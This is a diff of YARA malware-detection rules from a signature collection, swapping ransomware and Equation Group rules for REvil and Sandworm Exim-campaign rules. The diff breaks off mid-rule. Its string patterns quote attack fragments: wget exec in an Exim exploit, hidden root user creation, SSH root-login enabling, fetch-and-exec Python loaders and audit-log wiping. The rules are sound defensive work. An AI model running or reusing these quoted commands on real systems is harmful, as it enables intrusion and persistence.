+		description = "Detects REvil ransomware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0c85a2cc-3487-577f-bd12-e3effd8fc811"
+		date = "2020-10-13"
 		modified = "2023-12-05"
-		reference = "https://tmpout.sh/1/1.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L70-L86"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_revil.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "05379bbf3f46e05d385bbd853d33a13e7e5d7d50"
-		logic_hash = "33f096318647867bcd90d7ba77878f43d34477b2b2cbd7410c191e60573d6cd5"
-		score = 55
+		logic_hash = "756e49362c01abbca3208967630f09ed957e5c51956e0e5210b0167590582a82"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "0.1"
+		hash1 = "5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4"
+		hash2 = "f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5"
+		hash3 = "f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d"
+		hash4 = "fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501"
+
+	strings:
+		$op1 = { 0f 8c 74 ff ff ff 33 c0 5f 5e 5b 8b e5 5d c3 8b }
+		$op2 = { 8d 85 68 ff ff ff 50 e8 2a fe ff ff 8d 85 68 ff }
+		$op3 = { 89 4d f4 8b 4e 0c 33 4e 34 33 4e 5c 33 8e 84 }
+		$op4 = { 8d 85 68 ff ff ff 50 e8 05 06 00 00 8d 85 68 ff }
+		$op5 = { 8d 85 68 ff ff ff 56 57 ff 75 0c 50 e8 2f }
 
 	condition:
-		( uint32( 0 ) == 0x464c457f and uint8( 0x6 ) > 1 )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them or 4 of them
 }
-rule SIGNATURE_BASE_MAL_ELF_Torchtriton : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Keywords_May20_1 : CVE_2019_10149 FILE
 {
 	meta:
-		description = "Detection for backdoor (TorchTriton) distributed with a nightly build of PyTorch"
-		author = "Silas Cutler"
-		id = "85e98ee7-30bf-554f-a0ac-9df263e6dfe4"
-		date = "2023-01-02"
+		description = "Detects commands used by Sandworm group to exploit critical vulernability CVE-2019-10149 in Exim"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e0d4e90e-5547-5487-8d0c-a141d88fff7c"
+		date = "2020-05-28"
 		modified = "2023-12-05"
-		reference = "https://www.bleepingcomputer.com/news/security/pytorch-discloses-malicious-dependency-chain-compromise-over-holidays/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L88-L117"
+		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2385b29489cd9e35f92c072780f903ae2e517ed422eae67246ae50a5cc738a0e"
-		logic_hash = "12de3c3785aaf3623097db58abfe8ee2cbd9a0e712bf752165952de9a5fdb07d"
+		logic_hash = "9f9a81ff0c576f05ac063eaca7a5882dbdb09c9a0778610cca2864636a00efce"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		version = "1.0"
-		DaysofYARA = "2/100"
+		tags = "CVE-2019-10149, FILE"
 
 	strings:
-		$error = "failed to send packet"
-		$aes_key = "gIdk8tzrHLOM)mPY-R)QgG[;yRXYCZFU"
-		$aes_iv = "?BVsNqL]S.Ni"
-		$func01 = "splitIntoDomains("
-		$func02 = "packageForTransport"
-		$func03 = "gatherFiles"
-		$func04 = "void sendFile("
-		$domain = "&z-%`-(*"
+		$x1 = "MAIL FROM:<$(run("
+		$x2 = "exec\\x20\\x2Fusr\\x2Fbin\\x2Fwget\\x20\\x2DO\\x20\\x2D\\x20http"
 
 	condition:
-		uint32( 0 ) == 0x464c457f and ( ( all of ( $aes_* ) ) or ( all of ( $func* ) and $error ) or ( $domain and 2 of them ) )
+		filesize < 8000KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_GOLDBACKDOOR_LNK
+rule SIGNATURE_BASE_APT_Sandworm_SSH_Key_May20_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "Greg Lesnewich"
-		id = "9a80f875-4843-535c-9f2b-b04da55713b1"
-		date = "2023-01-02"
+		description = "Detects SSH key used by Sandworm on exploited machines"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ea2968b8-7ae4-56b8-9547-816c5e37c50a"
+		date = "2020-05-28"
 		modified = "2023-12-05"
-		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L119-L142"
+		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L17-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "120ca851663ef0ebef585d716c9e2ba67bd4870865160fec3b853156be1159c5"
-		logic_hash = "043d01758c722964e848e51cf2747c5879f03f0fd43af827e2035abf113daf9d"
+		logic_hash = "23a43849dfaa80bad2ca4f46b53181b3a4855ee89673ae9b658c854069b9aaa9"
 		score = 75
 		quality = 85
-		tags = ""
-		version = "1.0"
-		DaysofYARA = "2/100"
+		tags = "FILE"
+		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
 
 	strings:
-		$doc_header = {D0 CF 11 E0 A1 B1 1A E1}
-		$doc_icon_loc = "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.exe" ascii wide
-		$script_apionedrivecom_hex_enc_str = "6170692e6f6e6564726976652e636f6d" wide
-		$script_kernel32dll_hex_enc_str = "6b65726e656c33322e646c6c" wide
-		$script_GlobalAlloc_hex_enc_str = "476c6f62616c416c6c6f63" wide
-		$script_VirtualProtect_hex_enc_str = "5669727475616c50726f74656374" wide
-		$script_WriteByte_hex_enc_str = "577269746542797465" wide
-		$script_CreateThread_hex_enc_str = "437265617465546872656164" wide
+		$x1 = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2q/NGN/brzNfJiIp2zswtL33tr74pIAjMeWtXN1p5Hqp5fTp058U1EN4NmgmjX0KzNjjV"
 
 	condition:
-		uint32be( 0x0 ) == 0x4C000000 and 1 of ( $doc* ) and 2 of ( $script* )
+		filesize < 1000KB and 1 of them
 }
-rule SIGNATURE_BASE_MAL_EXE_Lockbit_V2 : FILE
+rule SIGNATURE_BASE_APT_Sandworm_SSHD_Config_Modification_May20_1 : FILE
 {
 	meta:
-		description = "Detection for LockBit version 2.x from 2011"
-		author = "Silas Cutler, modified by Florian Roth"
-		id = "a2c27110-e63b-5f93-88a0-98c12811e8b4"
-		date = "2023-01-01"
-		modified = "2023-01-06"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L144-L169"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "00260c390ffab5734208a7199df0e4229a76261c3f5b7264c4515acb8eb9c2f8"
-		logic_hash = "9472727d75e34d8bf87c56b74a6dfc04052e621b5fe31732ea9a10c76a05e0c0"
-		score = 80
-		quality = 60
+		description = "Detects ssh config entry inserted by Sandworm on compromised machines"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dd60eeb7-3d4b-5a6a-8054-50c617ee8c73"
+		date = "2020-05-28"
+		modified = "2023-12-05"
+		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L33-L49"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "5775588b3a9d44e9eb2c8ef0f50351d7e3b06f1005f669775fae7187900d5999"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		DaysofYARA = "1/100"
+		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
 
 	strings:
-		$s_ransom_note01 = "that is located in every encrypted folder." wide
-		$s_ransom_note02 = "Would you like to earn millions of dollars?" wide
-		$x_ransom_tox = "3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7" wide
-		$x_ransom_url = "http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion" wide
-		$s_str1 = "Active:[ %d [                  Completed:[ %d" wide
-		$x_str2 = "\\LockBit_Ransomware.hta" wide ascii
-		$s_str2 = "Ransomware.hta" wide ascii
+		$x1 = "AllowUsers mysql_db" ascii
+		$a1 = "ListenAddress" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 1 of ( $x* ) or 2 of them ) or 3 of them
+		filesize < 10KB and all of them
 }
-
-rule SIGNATURE_BASE_MAL_EXE_Prestigeransomware : FILE
+rule SIGNATURE_BASE_APT_Sandworm_Initfile_May20_1 : FILE
 {
 	meta:
-		description = "Detection for Prestige Ransomware"
-		author = "Silas Cutler, modfied by Florian Roth"
-		id = "5ac8033a-8b15-5abe-89d5-018a4fef9ab5"
-		date = "2023-01-04"
-		modified = "2023-01-06"
-		reference = "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L171-L195"
+		description = "Detects mysql init script used by Sandworm on compromised machines"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0bd613e3-6bd4-5cec-bc0d-2bdb83caf142"
+		date = "2020-05-28"
+		modified = "2023-12-05"
+		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L51-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5fc44c7342b84f50f24758e39c8848b2f0991e8817ef5465844f5f2ff6085a57"
-		logic_hash = "2f51ca71d28c8d0df8de22011e16919672d5f9d3f3d94594c5d0cbf7f1585a1e"
-		score = 80
+		logic_hash = "989f37069820d9ecf67dc71e4761a7cde2c1adf8db40b5f8a47e9c610ddec2e6"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		DaysofYARA = "4/100"
+		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
 
 	strings:
-		$x_ransom_email = "Prestige.ranusomeware@Proton.me" wide
-		$x_reg_ransom_note = "C:\\Windows\\System32\\reg.exe add HKCR\\enc\\shell\\open\\command /ve /t REG_SZ /d \"C:\\Windows\\Notepad.exe C:\\Users\\Public\\README\" /f" wide
-		$ransom_message01 = "To decrypt all the data, you will need to purchase our decryption software." wide
-		$ransom_message02 = "Contact us {}. In the letter, type your ID = {:X}." wide
-		$ransom_message03 = "- Do not try to decrypt your data using third party software, it may cause permanent data loss." wide
-		$ransom_message04 = "- Do not modify or rename encrypted files. You will lose them." wide
+		$s1 = "GRANT ALL PRIVILEGES ON * . * TO 'mysqldb'@'localhost';" ascii
+		$s2 = "CREATE USER 'mysqldb'@'localhost' IDENTIFIED BY '" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 1 of ( $x* ) or 2 of them or pe.imphash ( ) == "a32bbc5df4195de63ea06feb46cd6b55" )
+		filesize < 10KB and all of them
 }
-rule SIGNATURE_BASE_MAL_EXE_Royalransomware : FILE
+rule SIGNATURE_BASE_APT_Sandworm_User_May20_1 : FILE
 {
 	meta:
-		description = "Detection for Royal Ransomware seen Dec 2022"
-		author = "Silas Cutler, modfied by Florian Roth"
-		id = "f83316f7-b8c4-5907-a38e-80535215e7ef"
-		date = "2023-01-03"
+		description = "Detects user added by Sandworm on compromised machines"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ada549a4-abcc-5c0a-9601-75631e78c835"
+		date = "2020-05-28"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L197-L222"
+		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L68-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a8384c9e3689eb72fa737b570dbb53b2c3d103c62d46747a96e1e1becf14dfea"
-		logic_hash = "6f93bade7709945b478cbdc721d85ad9243d56ace19fba25835cec13a6210dfb"
+		logic_hash = "d052792a674dfa2d93a048b550ea085c3b9225662fdb09bf4a602093b0527e38"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		DaysofYARA = "3/100"
+		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
 
 	strings:
-		$x_ext = ".royal_" wide
-		$x_fname = "royal_dll.dll"
-		$s_readme = "README.TXT" wide
-		$s_cli_flag01 = "-networkonly" wide
-		$s_cli_flag02 = "-localonly" wide
-		$x_ransom_msg01 = "If you are reading this, it means that your system were hit by Royal ransomware."
-		$x_ransom_msg02 = "Try Royal today and enter the new era of data security!"
-		$x_onion_site = "http://royal2xthig3ou5hd7zsliqagy6yygk2cdelaxtni2fyad6dpmpxedid.onion/"
+		$s1 = "mysql_db:x:" ascii
+		$a1 = "root:x:"
+		$a2 = "daemon:x:"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 2 of ( $x* ) or 5 of them )
+		filesize < 4KB and all of them
 }
-rule SIGNATURE_BASE_MAL_PY_Dimorf
+rule SIGNATURE_BASE_APT_WEBSHELL_PHP_Sandworm_May20_1 : FILE
 {
 	meta:
-		description = "Detection for Dimorf ransomeware"
-		author = "Silas Cutler"
-		id = "78b53433-6926-58cd-8ec0-2195af803aab"
-		date = "2023-01-03"
+		description = "Detects GIF header PHP webshell used by Sandworm on compromised machines"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b9ec02c2-fa83-5f21-95cf-3528047b2d01"
+		date = "2020-05-28"
 		modified = "2023-12-05"
-		reference = "https://github.com/Ort0x36/Dimorf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_100days_of_yara_2023.yar#L224-L242"
+		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L86-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7499b21f77d07364983b94134a60f7c99e71a5392386437d459a196bf71852fb"
+		logic_hash = "0d10f618c7b465c7691d6054e994a76f56c12eb0a36d2d98b5accd2c1e2c1da7"
 		score = 75
 		quality = 85
-		tags = ""
-		version = "1.0"
+		tags = "FILE"
+		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
 
 	strings:
-		$func01 = "def find_and_encrypt"
-		$func02 = "def check_os"
-		$comment01 = "checks if the user has permission on the file."
-		$misc01 = "log_dimorf.log"
-		$misc02 = ".dimorf"
+		$h1 = "GIF89a <?php $" ascii
+		$s1 = "str_replace(" ascii
 
 	condition:
-		all of them
+		filesize < 10KB and $h1 at 0 and $s1
 }
-rule SIGNATURE_BASE_Equationgroup_Emptycriss : FILE
+rule SIGNATURE_BASE_APT_SH_Sandworm_Shell_Script_May20_1 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file emptycriss"
+		description = "Detects shell script used by Sandworm in attack against Exim mail server"
 		author = "Florian Roth (Nextron Systems)"
-		id = "658a0a2c-ea3a-5531-abea-54f0ed786e79"
-		date = "2017-04-08"
+		id = "21cf2c89-5511-5eb6-a2dd-4ad54ebfa2d1"
+		date = "2020-05-28"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L15-L30"
+		reference = "https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L103-L129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fcfbe4a8a959491dfba9e5d958e43221d83a1e49dcf005872a1b71efb1226d99"
+		logic_hash = "b9116585e74ad6159cd31c0c8a84566f981a62ca5b5f82ace8b855a180461071"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a698d35a0c4d25fd960bd40c1de1022bb0763b77938bf279e91c9330060b0b91"
+		hash1 = "dc074464e50502459038ac127b50b8c68ed52817a61c2f97f0add33447c8f730"
+		hash2 = "538d713cb47a6b5ec6a3416404e0fc1ebcbc219a127315529f519f936420c80e"
 
 	strings:
-		$s1 = "./emptycriss <target IP>" fullword ascii
-		$s2 = "Cut and paste the following to the telnet prompt:" fullword ascii
-		$s8 = "environ define TTYPROMPT abcdef" fullword ascii
+		$x1 = "echo \"GRANT ALL PRIVILEGES ON * . * TO 'mysqldb'@'localhost';\" >> init-file.txt" ascii fullword
+		$x2 = "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version" ascii fullword
+		$x3 = "sed -i -e '/PasswordAuthentication/s/no/yes/g; /PermitRootLogin/s/no/yes/g;" ascii fullword
+		$x4 = "useradd -M -l -g root -G root -b /root -u 0 -o mysql_db" ascii fullword
+		$s1 = "/ip.php?port=${PORT}\"" ascii fullword
+		$s2 = "sed -i -e '/PasswordAuthentication" ascii fullword
+		$s3 = "PATH_KEY=/root/.ssh/authorized_keys" ascii fullword
+		$s4 = "CREATE USER" ascii fullword
+		$s5 = "crontab -l | { cat; echo" ascii fullword
+		$s6 = "mysqld --user=mysql --init-file=/etc/opt/init-file.txt --console" ascii fullword
+		$s7 = "sshkey.php" ascii fullword
 
 	condition:
-		( filesize < 50KB and 1 of them )
+		uint16( 0 ) == 0x2123 and filesize < 20KB and 1 of ( $x* ) or 4 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Scripme : FILE
+rule SIGNATURE_BASE_APT_RU_Sandworm_PY_May20_1 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file scripme"
+		description = "Detects Sandworm Python loader"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a2c5cd8b-c104-57d9-9ce2-a0b9a8dd9288"
-		date = "2017-04-08"
+		id = "a392d800-1fe8-5ae9-b813-e1dfcedecda6"
+		date = "2020-05-28"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L32-L48"
+		reference = "https://twitter.com/billyleonard/status/1266054881225236482"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L131-L148"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5cffded6563bb3c94868f25e086be8d92837a7656707bf4e6a9e9f375d9ee7e0"
+		logic_hash = "2ccc4c7fc75c04cbcab34904de2e7ab055a15c1017ec0f8d01b06454f4395047"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a1adf1c1caad96e7b7fd92cbf419c4cfa13214e66497c9e46ec274a487cd098a"
+		hash1 = "c025008463fdbf44b2f845f2d82702805d931771aea4b506573b83c8f58bccca"
 
 	strings:
-		$x1 = "running \\\"tcpdump -n -n\\\", on the environment variable \\$INTERFACE, scripted" fullword ascii
-		$x2 = "Cannot read $opetc/scripme.override -- are you root?" ascii
-		$x3 = "$ENV{EXPLOIT_SCRIPME}" ascii
-		$x4 = "$opetc/scripme.override" ascii
+		$x1 = "o.addheaders=[('User-Agent','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko')]" ascii fullword
+		$s1 = "exec(o.open('http://" ascii
+		$s2 = "__import__({2:'urllib2',3:'urllib.request'}"
 
 	condition:
-		( filesize < 30KB and 1 of them )
+		uint16( 0 ) == 0x6d69 and filesize < 1KB and 1 of ( $x* ) or 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Crypttool : FILE
+rule SIGNATURE_BASE_APT_RU_Sandworm_PY_May20_2 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file cryptTool"
+		description = "Detects Sandworm Python loader"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e1f4e010-9c42-5b8a-8feb-2885b99307fe"
-		date = "2017-04-08"
+		id = "5b32ad64-d959-5632-a03c-17aa055b213f"
+		date = "2020-05-28"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L50-L64"
+		reference = "https://twitter.com/billyleonard/status/1266054881225236482"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_exim_expl.yar#L150-L167"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ae2d5eda038326376511450e1f5bd2bbf6264d23df013b005b322d70eb6266a0"
+		logic_hash = "5fb61a9cef64ecf97adc78bf67db667cfd9e5e6f3e03f1bba8f3cdbf6c257520"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "96947ad30a2ab15ca5ef53ba8969b9d9a89c48a403e8b22dd5698145ac6695d2"
+		hash1 = "abfa83cf54db8fa548942acd845b4f34acc94c46d4e1fb5ce7e97cc0c6596676"
 
 	strings:
-		$s1 = "The encryption key is " fullword ascii
-		$s2 = "___tempFile2.out" ascii
+		$x1 = "import sys;import re, subprocess;cmd" ascii fullword
+		$x2 = "UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http"
+		$x3 = "';t='/admin/get.php';req" ascii
+		$x4 = "ps -ef | grep Little\\ Snitch | grep " ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 200KB and all of them )
+		uint16( 0 ) == 0x6d69 and filesize < 2KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Dumppoppy : FILE
+rule SIGNATURE_BASE_EQGRP_Noclient_3_0_5 : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file dumppoppy"
+		description = "Detects tool from EQGRP toolset - file noclient-3.0.5.3"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c316aac3-bdd7-5187-8ae2-0a87c2f2d26f"
-		date = "2017-04-08"
+		id = "af7472ce-0605-5f50-8180-23438d2196b8"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L66-L82"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L12-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b6fb6a3799196375796da6f3a0169246145e668019dd692da67ca6f06d09c3dc"
+		logic_hash = "51a6bf03c8d034942bf02fae2bea52436f53b4d437006b1dbe9c0c67387fe17a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4a5c01590063c78d03c092570b3206fde211daaa885caac2ab0d42051d4fc719"
 
 	strings:
-		$x1 = "Unless the -c (clobber) option is used, if two RETR commands of the" fullword ascii
-		$x2 = "mywarn(\"End of $destfile determined by \\\"^Connection closed by foreign host\\\"\")" fullword ascii
-		$l1 = "End of $destfile determined by \"^Connection closed by foreign host"
+		$x1 = "-C %s 127.0.0.1\" scripme -F -t JACKPOPIN4 '&" fullword ascii
+		$x2 = "Command too long!  What the HELL are you trying to do to me?!?!  Try one smaller than %d bozo." fullword ascii
+		$x3 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" fullword ascii
+		$x4 = "Error from ourtn, did not find keys=target in tn.spayed" fullword ascii
+		$x5 = "ourtn -d -D %s -W 127.0.0.1:%d  -i %s -p %d %s %s" fullword ascii
 
 	condition:
-		( filesize < 20KB and 1 of them )
+		( uint16( 0 ) == 0x457f and filesize < 700KB and 1 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Auditcleaner : FILE
+rule SIGNATURE_BASE_EQGRP_Installdate : FILE
 {
 	meta:
-		description = "Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner"
+		description = "Detects tool from EQGRP toolset - file installdate.pl"
 		author = "Florian Roth (Nextron Systems)"
-		id = "39ed798a-221d-5a4b-8809-db01d5241418"
-		date = "2017-04-08"
+		id = "029b1213-1206-5b7c-bd72-93239a23fe8a"
+		date = "2016-08-15"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L84-L102"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L31-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "30a6ae9ce7d02c1d945d57eabf29f430ad4cdbc48dba5fe71654efc2c59fde08"
+		logic_hash = "363a9c92c4d2560ba6dd0ec41acf136dff4346f20d54f971d319ed2aa531fe31"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8c172a60fa9e50f0df493bf5baeb7cc311baef327431526c47114335e0097626"
 
 	strings:
-		$x1 = "> /var/log/audit/audit.log; rm -f ." ascii
-		$x2 = "Pastables to run on target:" ascii
